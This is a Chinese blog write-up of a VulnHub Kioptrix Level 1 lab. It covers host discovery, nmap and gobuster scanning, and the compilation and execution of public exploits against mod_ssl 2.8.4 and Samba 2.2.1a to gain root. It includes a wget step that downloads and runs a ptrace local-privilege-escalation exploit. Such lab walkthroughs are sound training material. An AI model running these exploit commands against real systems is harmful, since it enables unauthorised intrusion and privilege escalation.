vulnhub-Kioptrix_Level_1靶机的测试报告

最新推荐文章于 2024-11-13 09:57:02 发布
最新推荐文章于 2024-11-13 09:57:02 发布
阅读量1.2k 收藏 25
点赞数 42
分类专栏: vulnhub靶机 文章标签: 网络 mod_ssl2.8 smb2.2 网络安全 payload exp root权限
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79698171/article/details/142852156
版权

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、解决检测不到IP的问题

2、信息搜集

3、利用exp

①mod_ssl2.8版本漏洞

 ②smb2.2版本漏洞

四、结论

一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.202.134)

靶  机:Linux kioptrix.level1 2.4.7-10

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录遍历)、searchspoilt(查找漏洞库)、msf(执行exp)、gcc(编译C源码)、apt-get(安装库函数)

测试网址:http://192.168.202.164

二、测试目的

根据靶机存在的smb版本漏洞和mod_ssl版本漏洞,利用exp获取root权限。

三、操作过程

1、解决检测不到IP的问题

该靶机直接打开会检测不到IP

解决办法:

1.关闭虚拟机并移除

2.将.vmx文件中以 ethernet0 开头的条目删除并保存修改

3.将VirtualHW.version改为VMware的版本保存

4.重新添加网络适配器,原来的桥接删除

2、信息搜集

主机探测

arp-scan -l

靶机的IP:192.168.202.164

端口和服务探测

nmap -sS -A -T4 -p- 192.168.202.164

开启了ssh服务(22端口)、web服务(80端口、443端口)、smb服务(139端口)

可以看到apache版本是1.3.20   mod_ssl版本是2.8.4  都是很老的版本,存在漏洞

https服务访问不到,状态码400

目录扫描

gobuster dir -u http://192.168.202.164 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

80端口打开是apache默认页

test.php页面也是测试页面,没有信息

3、利用exp

通过exp直接能获取root权限

①mod_ssl2.8版本漏洞

查找该版本漏洞,远程的缓冲区溢出漏洞

漏洞库:

https://www.exploit-db.com/

下载exp,查看源码,通常会有编译命令

安装需要的库

apt-get install libssl-dev

将exp上传到kali,进行编译

gcc 47080.c -o ccc -lcrypto

报了错,但编译成功了

运行编译好的程序,查看参数使用方法

需要系统版本编号、IP地址、ssl服务的端口

查找一下靶机相关的系统版本

是redhat版本的Linux, apache版本是1.3.20

有两个版本编号可以使用

./ccc | grep '1.3.20'

使用管道符,查找特定apache版本的编号

./ccc 0x6a 192.168.202.164 443
./ccc 0x6b 192.168.202.164 443

都尝试,0x6b的版本getshell成功,不过只是普通用户权限

报了一些ssl连接失败的错误,https连接出了问题

一个新的exp未下载成功

可以手动下载编译并执行exp

使用http访问

​wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
gcc -o exploit ptrace-kmod.c
./exploit

成功获取root权限

 ②smb2.2版本漏洞

靶机smb服务的版本还未知,先用msf查看一下

使用auxiliary模块下的smb_version探测

search smb_version

设置靶机IP为参数即可

use 0
show options
set rhost 192.168.202.164
run

探测到smb服务的版本是2.2.1a

查找该版本的漏洞,有远程命令执行的exp可以使用

查找exp路径,查看源码

searchsploit -p 10.c
cp /usr/share/exploitdb/exploits/multiple/remote/10.c 10.c
cat 10.c

直接编译即可,运行查看参数

gcc 10.c -o zzz
./zzz

需要给定靶机的IP

-b参数指定系统类型

其他默认即可

执行exp获取靶机root权限

./zzz -b 0 192.168.202.164

四、结论

使用工具要及时更新版本,避免使用存在漏洞的版本。系统也要及时打补丁。

ccc_9wy
关注
专栏目录
Kioptrix_Level_1-writeup
Lee
08-19 662
Kioptrix_Level_1-writeup 0x00 信息收集 目标机器IP 16.16.16.176 kali攻击机 16.16.16.177 //nmap扫描端口服务 nmap -A -Pn 16.16.16.176 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-19 13:43 CST Nmap scan report for 16.16.16.176 Host is up (0.00081s latency). Not
Vulnhub靶机Kioptrix_Level1
qq_48904485的博客
03-12 1038
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub靶机Kioptrix_Level1.3
qq_48904485的博客
03-17 511
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.3(192.168.56.109)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25安装虚拟机:由于下载下来的压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘选择自定义安装操作系统选择linux,版本随便选一个,其他默认即可。
Vulnhub靶机Kioptrix_Level1.1
qq_48904485的博客
03-13 481
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.1(192.168.56.104)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Vulnhub靶机Kioptrix_Level1.2
qq_48904485的博客
03-14 506
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
vulnhub-Kioptrix_Level_2_update靶机测试报告
ccc_9wy的博客
10-11 1568
基于渗透测试流程测试Kioptrix_Level_2_update靶机;sql注入;RCE;远程命令执行;getshell;Linux内核漏洞提权;反弹shell;
VulnHub靶机入门篇--kioptrix.level 3
2302_78903258的博客
07-29 1040
发现有一个login的登录框,可能存在sql注入漏洞,或者弱口令,并且发现这里有一个LotusCMS,网上查找一个信息,看看有没有相关的漏洞。这边可以看到URI为/lcms/但是我本地是没有这个路径的,所以我们这里需要设置下RHOSTS和URI。使用如下命令选择此 Auxiliary,或者使用命令。这里一直没有什么反应,可能是脚本的原因,用。哎,还是失败 ,查看原因,说使用Nat模式。使用msfconsole命令进入msf6。好像并没有什么用,只能看看80端口的服务。使用第14个的命令或者使用命令。
vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 650
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
vulnhubKioptrix_level2 靶机
Nicky_Zheng的博客
02-01 529
1、信息收集 1.1、虚拟机发现扫描 使用netdiscover进行 arp 扫描,发现虚拟机 ip(192.168.57.140) Currently scanning: 192.168.191.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep pack
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 567
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 926
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
Vulnhub系列-Kioptrix-Level-2
Yasso的博客
12-18 625
靶机: 192.168.249.130 kali: 192.168.249.129 一、信息收集 arp-scan -l nmap -sV 192.168.249.130—查看开放端口 ----访问下80端口---- 发现是个登录框先试试万能密码 username:admin' or 1=1# password:123(任意密码) 发现可以登陆,即存在sql注入 二、0x00漏洞利用(sql注入) sqlmap跑一下数据 登陆框抓包,因为sql注入在username处,在username处标记(减少测试时
Vulnhub系列-Kioptrix-Level-5
Yasso的博客
12-22 369
靶机:192.168.249.134 kali: 192.168.249.132 一、信息收集 ufs:/dev/ada0p2 —指定根分区启动系统 这样指定根分区启动成功 –靶机变为login才算打开— nmap -sV 192.168.249.134 —查看开放端口 —访问下80端口— <查看源代码> <看到URL访问下> —搜下有无pChart 2.1.3的漏洞— <貌似是个目录遍历漏洞和xss,看下exp怎么利用> 先玩玩XSS,刚开始以为是反射型 测试
Vulnhub系列-Kioptrix-Level-3
Yasso的博客
12-19 1365
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
AnaTraf | 巧用网络流量分析技术,守护网络 “健康”
最新发布
Johnstons的博客
11-13 243
这时候,借助流量分析工具查看流量情况,若是发现某条链路的流量出现了异常的高峰,远超正常的带宽承载能力,那很可能就是这条链路出现了拥塞问题,或许是有设备在疯狂发送大量无用的数据,导致网络 “交通堵塞”。比如,长期观察发现某个区域的网络节点总是出现流量高峰,而当前的网络带宽配置又不足以应对这样的高峰,那我们就可以针对性地进行带宽升级,或者调整网络拓扑结构,进行流量的合理分流,让数据能够更加顺畅地在网络中 “流淌”。网络流量分析技术,简单来说,就是对网络中流动的数据进行监测、收集、解析以及统计的技术手段。
字节序(Byte Order)
weixin_50993868的博客
11-11 256
字节序与平台字节序转换字节序(Byte Order)是指数据在内存中存储时字节的排列顺序。由于不同的计算机体系结构可能采用不同的字节序,因此理解字节序非常重要,特别是在处理多平台数据传输或存储时。
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 384
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
Tcp/Ip协议,tcp相关文章,网络编程,通信协议文章汇总
求是
11-10 390
都是网络协议相关的,tcp/ip, arp, dhcp, icmp, http。学习时候,有些书籍过一段时间就忘记了。常读常新,特此留下地址方便再次阅读!4.如果你喜欢看视频。1. tcp/ip 协议卷。2.不为人知的网络编程。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ccc_9wy

觉得写的好的话就赏杯奶茶喝吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值